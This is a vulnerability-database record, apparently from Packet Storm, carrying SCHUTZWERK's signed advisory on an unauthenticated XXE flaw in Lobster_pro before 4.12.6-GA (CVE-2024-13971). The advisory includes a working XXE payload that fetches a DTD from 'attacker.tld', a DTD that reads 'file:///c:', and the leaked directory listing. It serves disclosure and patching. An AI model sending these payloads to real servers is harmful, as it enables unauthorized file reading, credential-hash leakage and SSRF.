📄 Lobster_pro Arbitrary File Read / Server-Side Request Forgery_PACKETSTORM:221284

{
    "lastseen": "2026-05-18T19:59:54",
    "description": "Unauthenticated attackers can exploit a weakness in the XML parser functionality of Lobsterpro prior to version 4.12.6-GA. This allows them to obtain read access to files on the application server and adjacent network shares, and perform HTTP GET...",
    "published": "2026-05-18T00:00:00",
    "modified": "2026-05-18T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 Lobster_pro Arbitrary File Read / Server-Side Request Forgery",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:221284",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2024-13971"
    ],
    "sourceData": "-----BEGIN PGP SIGNED MESSAGE-----\n    Hash: SHA512\n    \n    Arbitrary File Read and Server Side Request Forgery via XML External \n    Entities in\n    Lobster_pro\n    ============================================================================================\n    \n    Unauthenticated attackers can exploit a weakness in the XML parser \n    functionality of\n    Lobster_pro prior to version 4.12.6-GA. This allows them to obtain read \n    access to files on\n    the application server and adjacent network shares, and perform HTTP GET \n    requests to\n    arbitrary services.\n    \n    Metadata\n    ========\n    \n    - - Affected product: Lobster_pro\n    - - Affected version: versions prior to 4.12.6-GA\n    - - Vendor: Lobster DATA GmbH\n    - - Problem type(s): CWE-611 Improper Restriction of XML External Entity \n    Reference\n    - - CVE ID: CVE-2024-13971\n    - - CVE URL: https://www.cve.org/CVERecord?id=CVE-2024-13971\n    - - CVSS 4.0 score: 7.7\n    - - Advisory URL: https://www.schutzwerk.com/en/blog/schutzwerk-sa-2024-005/\n    \n    Details\n    =======\n    \n    During a recent red team engagement, the no-code platform Lobster_pro \n    was identified as\n    part of the customer's internet-facing assets.\n    \n    The endpoint https://<lobster-pro instance>:443/system/web was found to \n    process XML via\n    HTTP POST requests. Sending the following payload and observing the \n    attacker-controlled\n    web server confirms that XML External Entities (XXE) are followed and \n    loaded by the\n    application:\n    \n    <?xml version=\"1.0\" encoding=\"UTF-8\"?>\n    <!DOCTYPE lbsterq [\n             <!ENTITY % lobster SYSTEM \"http://attacker.tld/map.dtd\">\n    %lobster;\n    ]>\n    <properties>lobster</properties>\n    \n    Serving the following file map.dtd, it is possible to retrieve file \n    contents, directory\n    listings or HTTP responses via the error message returned by the endpoint:\n    \n    <!ENTITY % cfga SYSTEM \"file:///c:\">\n    <!ENTITY % eea \"<!ENTITY % lobsterdata SYSTEM '#%cfga;'>\">\n    %eea;\n    %lobsterdata;\n    \n    The HTTP response contains an error message, embedding the file content \n    or directory\n    listing:\n    \n    <?xml version=\"1.0\" encoding=\"UTF-8\"?>\n    <core:ErrorResponse xmlns:core=\"CORESYSTEM\">\n       <errorInfo>\n          <errorCode>500</errorCode>\n          <httpResponseStatus>200</httpResponseStatus>\n          <locale>en</locale>\n          <errorText>javax.xml.bind.UnmarshalException\n     - with linked exception:\n    [Exception [EclipseLink-25004] (Eclipse Persistence Services - \n    2.7.8.qualifier): \n    org.eclipse.persistence.exceptions.XMLMarshalException
\n    Exception Description: An error occurred unmarshalling the document
\n    Internal Exception: javax.xml.stream.XMLStreamException: ParseError at \n    [row,col]:[4,10]\n    Message: no protocol: #$Recycle.Bin\n    Config.Msi\n    [...]\n    pagefile.sys\n    PerfLogs\n    ProgramData\n    Program Files\n    Program Files (x86)\n    Programme\n    [...]\n    temp\n    Users\n    Windows\n    ]</errorText>\n          <errorType>java.io.IOException</errorType>\n          <errorLevel>1</errorLevel>\n       </errorInfo>\n    </core:ErrorResponse>\n    \n    Due to the way content is included, some symbols (e.g., the percent sign \n    %) lead to\n    recursive entity declarations, thus preventing data exfiltration.\n    \n    Risk\n    ====\n    \n    An attacker can use the vulnerability to gather information and, \n    depending on the stored\n    data, exfiltrate secrets from the file system and adjacent SMB shares. \n    Furthermore, HTTP\n    requests can be used for out-of-band exfiltration and server side \n    request forgery (SSRF)\n    attacks. Utilizing the SMB protocol could also enable leakage of the \n    application user NTLM\n    hash.\n    \n    Solution/Mitigation\n    ===================\n    \n    Update to Lobster_pro release 4.12.6-GA or higher.\n    \n    Timeline\n    ========\n    \n    - - 2024-08-12 Initial contact with vendor\n    - - 2024-08-14 Vulnerability reported to vendor\n    - - 2024-08-14 CVE ID requested\n    - - 2024-08-22 Initial feedback received from vendor: unable to reproduce\n    - - 2024-08-28 Vulnerability demonstrated in vendor's \"Community server\"\n    - - 2024-09-19 Vulnerability reported fixed by vendor in Lobster_pro \n    release 4.12.6-GA\n    - - 2025-07-03 Reserved CVE ID CVE-2024-13971\n    - - 2026-04-30 Advisory released\n    \n    Credits\n    =======\n    \n    The vulnerability was discovered by Marcelo Reyes of SCHUTZWERK GmbH.\n    -----BEGIN PGP SIGNATURE-----\n    \n    iQJOBAEBCgA4FiEEgLsg7Oj/wY3LSF87GrXfkTIXLrsFAmnzRmsaHGFkdmlzb3Jp\n    ZXNAc2NodXR6d2Vyay5jb20ACgkQGrXfkTIXLrsvxRAAkVaWMk/lJwfZi0Y0OWpr\n    5TQP/YCieTkxpkdiY0PF8dGApB3cp8ysschRAUgWIbeR7f1cj/4hbc3a1GxnZWV7\n    2gk1fdQieSdkJs8uBsKz0CeEasMztCI6KcmxWL+CMFHJoH+Q5Gd7MdOh1Og/zVgh\n    /UAAfzxihL0Gmx+gl6hpZVYSmqQctD4ogbmdQCU2mEuoHZRGLCzaiOtS8AZbOhvT\n    3IvC3ws3cQIAwzD7YH+5V+97cXqbFVnRoNL4YgJ9/pCHXinYZvL1JGL4Ob26/GvD\n    QfYqUOgpDsfr9GTZVSZT3S8pUVomMW9+FOjhpcOkRICkJ8cEdLhW5CIoaxweEcwE\n    PQSSC5QS5DIfVKgGo4lc0Oe9k3pT/dnH9iEfnV5hnq7+JgapQzqxNaf6BCZJX+ET\n    voIVVjyOYyP2Qzs4LSaArWxlcb0XR/DewW9qlvfnea4SfDkrG/hhRK3qBNrC83IR\n    IXmBTbp32Sfoh2X1W/frL4BtvIXkDirgF+sttAjoQKN3wVttuKj1JaM/BQ/pDf/N\n    pPAwaYzuuuf2Wv3NiBKIgB5tHuHKAQoKQPev7Z6pvDq0sB5ps9SRknIOEmfh/aoE\n    7aNztVHs+/6axCVKcuV7+qWv6HUwg4oDp78Lo9r8Oq/9rdbZ3TKtf/KWn4uT+sWw\n    Zk6o928sfQFlkXtTXRiGSwE=\n    =560Z\n    -----END PGP SIGNATURE-----\n    \n    -- \n    SCHUTZWERK GmbH, Pfarrer-Wei\u00df-Weg 12, 89077 Ulm, Germany\n    Zertifiziert / Certified ISO 27001, 9001 and TISAX\n    \n    Phone +49 731 977 191 0\n    \n    [email protected] / www.schutzwerk.com\n    \n    Gesch\u00e4ftsf\u00fchrer / Managing Directors:\n    Jakob Pietzka, Michael Sch\u00e4fer\n    \n    Amtsgericht Ulm /  HRB 727391\n    Datenschutz / Data Protection www.schutzwerk.com/datenschutz",
    "sourceHref": "https://packetstorm.news/download/221284",
    "cvss": {
        "score": 7.7,
        "severity": "HIGH",
        "vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/SC:H/VI:N/SI:N/VA:N/SA:N/S:N/AU:Y/V:C",
        "version": "4.0"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/221284/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}